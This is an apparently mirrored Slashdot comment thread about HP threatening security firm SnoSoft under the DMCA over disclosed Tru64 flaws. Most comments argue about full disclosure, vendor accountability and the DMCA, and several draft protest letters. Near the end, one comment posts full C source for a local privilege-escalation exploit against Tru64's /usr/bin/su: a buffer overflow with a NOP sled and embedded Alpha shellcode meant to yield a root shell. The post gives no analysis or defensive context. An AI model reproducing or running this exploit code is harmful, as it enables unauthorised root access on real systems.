Slashdot Mirror
HP Uses DMCA To Quash Vulnerability Publication
Several readers wrote to note the fact that HP has evidently threatened to use the DMCA and computer crime laws against SnoSoft who have found a security flaw in Tru64. The quote from the HP VP is that the accused "could be fined up to $500,000 and imprisoned for up to five years."
So this is the real reason HP didn't want Bruce Perens to demonstrate against the DMCA?
Very mature compared to what big business does. "Wahh wahhh wahh!!! Help us Uncle Sam, we're poor defenseless transnational corporations!" Buncha whiners.
People shape laws. Not the other way around.
When Alan Cox originally discussed the notion that companies would (mis)use the DMCA in the security field, he was widely attacked for being silly.
Anyone still feel like laughing?
Halfway around the world, Bill Gates breathes a long sigh of relief as Microsoft's profitability is assured well into the next century...
-Chris
--an unbreakable toy is useful for breaking other toys--
Finisterre said that while he wanted to resolve the dispute with HP, he resented receiving DMCA threats. "We are like the guys that found out that Firestone tires have issues on Ford explorers," he said. "It's not our fault your Explorer has crap tires. We just pointed it out. We should not get attacked for pointing out issues in someone's product nor for proving it is possible."
When will people learn this is the same thing?
The public has the right to know about these security flaws, just as much as we have the right to know if the tires we buy pass safety standards.
HP trying to cover this up just proves its a problem. HP is using the DMCA to prevent people from discussing valid flaws in their OS'.
People have the right to know if the car they're driving -- or are going to buy -- is unsafe. Why? Because their lives depend on it, literally. For the same reason, people have the right to know if the OS they're using is secure. Why? Because their lives depend on it, or at least their carreers. Data important to one's carreer (i.e., scientific experimental data) is stored on one's computer. Private information -- i.e., credit card information -- is stored on a computer. Security holes can literally destroy one's life.
We have the right to know exactly what problems their are in our software.
social sciences can never use experience to verify their statemen
Email their president and CEO from this page!
Tell her in NICE non flaming tones why you feel what they are doing is wrong. Explain that this kind of action makes you unwilling to buy any more products from them.
--Won't that be grand? Computers and the programs will start thinking and the people will stop. - Dr. Walter Gibbs
For those of you who are HPaq-ese impaired, here is the message:
Dear HPaq customers,
We thank you for having purchased our products in the past, but now that we have finalized our merger and cashed our options, we have lost our minds and come to the boggling conclusion that we don't want your money anymore. Please do not buy our products because honestly you can't trust us to inform you when there is a defect with our product. This includes any servers, and handhelds our merger partner might peddle, printers, or whatever the hell it is these people do. As a sign of our gratitude for your service, we will be providing each future customer with a free Berber mousepad under which you can sweep any problems you discover. I you believe the problem doesn't exist, and we believe the problem doesn't exist, then we can work together to warp reality and drive cusomers away like poor starving slobs on the street corner to a free luncheon. Personally, I don't recommend you use these things in anything that might risk a human life or attempt to improve society in any way. Heck, I wouldn't run my porn servers on this crap. Well, gotta run, muy coke dealer is here. And don't forget to F off!
P.S. - Don't unravel the mousepad to see how it's made or we'll sue your ass into orbit under the DCMA.
"Beware of he who would deny you access to information, for in his heart, he dreams himself your master."
I am quite disappointed with HP's recent conduct with two issues related to the DMCA. I am in a senior enough position as a UNIX administrator that I have significant impact in how a multi-million dollar IT budget is spent. HP's invocation of the DMCA reduces my trust in HP as a vendor of secure and reliable technology. Therefore I am less inclined now than I ever have been in the past to purchase HP products.
The first issue is HP's request that Bruce Parens not present his findings on DVD copyright controls. If he is acting on his own behalf, and includes a disclaimer that this is a separate issue from what he does under the employment of HP, he should be allowed to go forth. If he is presenting HP intellectual property, HP has the right and responsibility to protect itself. This, however, does not seem to be the case.
The more disturbing issue is with regards to the handling of SnoSoft's publication of root exploits to the Tru64 operating system. As a UNIX administrator, I am responsible for researching technologies that I will put into production. Many times, these products are used to protect the intellectual property, stability, or other things that are of great importance to my employer's success and my career. If security researchers cannot force many of the bugs out in the open before I evaluate products, I have much more work on my hands. Furthermore, if I find a bug that I know can be used to compromise my system, without the ability to publicly discuss and disclose the bug, I may be unable to get a fix from the vendor or a home-grown workaround. If I am at the complete mercy of my vendors' good will, I fear that I will have a system that lacks stability and security.
Please reconsider your decision to use the Digital Millenium Copyright Act to stifle free speech. Once you come to the realization that the DMCA is not a law that is useful for HP, please put your lobbying efforts into repealing it and push for funding to enforce pre-DMCA laws that already provide more than adequate protections on copyright and other intellectual property issues.
I do not speak for my employer. Please remember, however, that my employer trusts me to make decisions that are in the employer's best interest. Your actions suggest that the purchase of HP products is in the best interest of no employer that I would work for.
As of now, HP has also only threatened to invoke it.
...
...
...
Uh, no, "invoking the DMCA" is precicely what HP is doing, though they haven't formally filed a complaint with the feds. How can you possibly defend these unscrupulous fucks? From dictionary.com.
invoke Pronunciation Key(n-vk)
tr.v. invoked, invoking, invokes
2. To appeal to or cite in support or justification.
5. To resort to; use or apply:
You know it is possible -- and ethical! -- to not do something because it goes too far. Or is HP obligated to murder someone if it increases shareholder profit? And before you say, "Well, the law imposes too high a cost", answer me this: What if you could prove the legal sanction was less than the profit realized? Should HP kill the person? Must they?
The Mongrel Dogs Who Teach
The American way is the right to Life, Liberty, and the pursuit of Happiness. The American way is that no law shall abridge free of speech or of the press.
"The only law shalt be maximixe your stock price at all costs" is part of something worse. It isn't even part of the Capitalist way, for true capitalism only works with wide availability of information and strong competition. This is the inbred freak son of Capitalism and Greed. The is the way of life of scam artists, shysters, hucksters, thieves. This is the Monopolist's Way.
I understand perfectly well that "thou shalt increase your stock price or face lawsuits," but I don't have to like it. It's a corruption of everything America, freedom, and true capitalism. I have every right to name it beast and call for it to be cast into the fires.
Search 2010 Gen Con events
Let the crackers have it.
...richie - It is a good day to code.
Call me crazy, but if I were a mega-corporation, I wouldn't want someone releasing "warez" to break into my systems this way.
No, of course you wouldn't like it. And, if you were an emperor who got suckered into walking around naked, you'd be fairly pissed at the kid who pointed out that you were, in fact, naked.
But, this story has nothing to do with HP "liking" or "not liking" it when people (rightly) point out that they're walking around naked. The story is about the fact that the DMCA has emboldened HP to the point that they feel it's better to walk around naked and sue anyone who notices, rather than buying some reasonable clothes.
Etiquette in the security community demands that the discovers of holes give companies reasonable time to respond to security problems, before publicizing the security problems. But this courtesy is not, in any way, a courtesy towards the company that manufactures the flawed product. That company's opinion in the matter doesn't mean squat. It is a courtesy extended entirely to the users of the product. Users are harmed if they do not know about exploitable flaws in the products they use, but at the same time users are harmed if the exploitable flaws are widely known before patches are available. The only reasonable role for a company with flawed products in the security process is to work diligently to minimize the harm to users, by the only method available to them -- by expediting patches for their products, and thus providing an environment where the user can be informed of security flaws in their product as quickly as possible.
Unfortunately, what HP has done here is imagine itself to have some other role in the security process -- someone at HP is under the completely mistaken impression that their opinion of the security process matters in any way. It does not. The courtesies of the security process are entirely towards the users of the flawed product. People have a right to know about flawed products. HP has the opportunity to provide patches to their product, so that those users might have some alternative to simply throwing all of their HP equipment in the garbage, but that is entirely HP's opportunity, and really of no concern either to the users or to the security professionals who disclose the hole.
I just want to say that I an 100% behind your request for time instead of having to answer to a horde of mad slashdot zealots wielding pitchforks when you've had no time to investigate. Not all of us here are so quick to assume the worst.
Good luck in your discussions with the PHB's that be.
7 November 2006: The day Americans realized corruption and incompetence weren't addressing 11 September 2001
Bruce, if I were president of HP, I would immediately fire Kent Ferson, the vice president who wrote the letter. The letter says, basically, that HP is not able to fix the problem, and would rather hide its security problems.
This is a marketing disaster for HP. Probably Mr. Ferson has little technical knowledge and does not realize that his letter speaks loudly and clearly to the whole world of technically knowledgeable people, and does irrepairable damage to HP.
We live in an amazing world where free products are better than expensive ones. The open source response to a security problem is to have a bug fix on all the mirrors in 48 hours. The response of billion dollar companies with tens of thousands of well-paid employees is to try to weasel out of doing the right thing. Who would have guessed it would be that way?
It seems that you could do HP a big favor if you could educate top management. But maybe they are not educable.
Today I read an article on news.com (http://news.com.com/2100-1023-947325.html) that Hewlett-Packard has intended to use the Digital Millennium Copyright Act (DMCA) to punish a company that has released information about a security vulnerability in an HP product. For quite some time I have been telling you that the DMCA is a bad law that needs to be repealed, and this is just more evidence to that effect. HP has known about this vulnerability for a year, but has chosen to do nothing to fix it.
HP's action could set a precedent that would stifle technology research. Companies would be free to release broken technologies that would eventually be used in high-security environments. Anyone who attempted to test the strengths of these products would be branded a criminal.
HP's customers and the American public deserve to know about security issues in HP's products. Withholding such information is just like the accounting scandals that have been rampant in recent times. Insecure technology is a weapon that hackers and terrorists can use against us. So when an American company decides to hide behind an American law rather than fix it products, our politicians need to re-examine that law.
I urge you to sponsor legislation that will repeal the DMCA. Americans deserve better. Please write back to me and let me know that you support my fair use rights in a digital world, and that you'll be working to repeal the DMCA.
And the men who hold high places must be the ones who start
To mold a new reality... closer to the heart
Bruce,
I guess I don't understand how full disclosure can equate to a shakedown.
The company (snosoft) seems like a more or less legit research company, and the fact that they have a full disclosure policy in no way says that they are trying to take out companies. It just says, up front, that they have a policy of disclosing these security breaches that they find.
On the other hand they have to make money somehow - so they contract out their services to companies who wish to have their software audited.
I could be wrong, but by looking through their posts on security focus, I don't think they are out to extort money from companies - and this is especially true if they gave HP a year to fix this problem (in fact if that is true then you should REALLY stick it to the top brass).
It could go either way - but it doesn't look like they are in the business of extortion. And the fact that they have been around for a while, and seem to be respected in the security community says quite a lot....
ON THE OTHER HAND.... I don't see how it is in any way shape or form right for HP to sick the DMCA on them, no matter what their business practices are. This is a vulnerability in HPQ's software and should not be treated with such arrogance (don't report it or else!).
Just my $.02
Derek
Bruce
Bruce Perens.
#include <stdio.h>
/* 0x140010401 */
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
char shellcode[]=
"\x30\x15\xd9\x43" "\x11\x74\xf0\x47" "\x12\x14\x02\x42" "\xfc\xff\x32\xb2" "\x12\x94\x09\x42" "\xfc\xff\x32\xb2" "\xff\x47\x3f\x26" "\x1f\x04\x31\x22" "\xfc\xff\x30\xb2" "\xf7\xff\x1f\xd2" "\x10\x04\xff\x47"
"\x11\x14\xe3\x43" "\x20\x35\x20\x42" "\xff\xff\xff\xff" "\x30\x15\xd9\x43" "\x31\x15\xd8\x43" "\x12\x04\xff\x47" "\x40\xff\x1e\xb6" "\x48\xff\xfe\xb7" "\x98\xff\x7f\x26" "\xd0\x8c\x73\x22" "\x13\x05\xf3\x47" "\x3c\xff\x7e\xb2" "\x69\x6e\x7f\x26" "\x2f\x62\x73\x22" "\x38\xff\x7e\xb2" "\x13\x94\xe7\x43" "\x20\x35\x60\x42" "\xff\xff\xff\xff";
main(int argc, char *argv[]) {
int i, j;
char buffer[8239];
char payload[15200];
char nop[] = "\x1f\x04\xff\x47";
bzero(&buffer, 8239);
bzero(&payload, 15200);
for (i=0;i<8233;i++)
buffer[i] = 0x41;
buffer[i++] = 0x01;
buffer[i++] = 0x04;
buffer[i++] = 0x01;
buffer[i++] = 0x40;
buffer[i++] = 0x01;
for (i=0;i<15000;) {
for(j=0;j<4;j++) {
payload[i++] = nop[j];
}
}
for (i=i,j=0;j<sizeof(shellcode);i++,j++)
payload[i] = shellcode[j];
printf("/bin/su by phased\n");
printf("payload %db\n", strlen(payload));
printf("buffer %db\n", strlen(buffer));
execl("/usr/bin/su", "su", buffer, payload, 0);
}
The theory of relativity doesn't work right in Arkansas.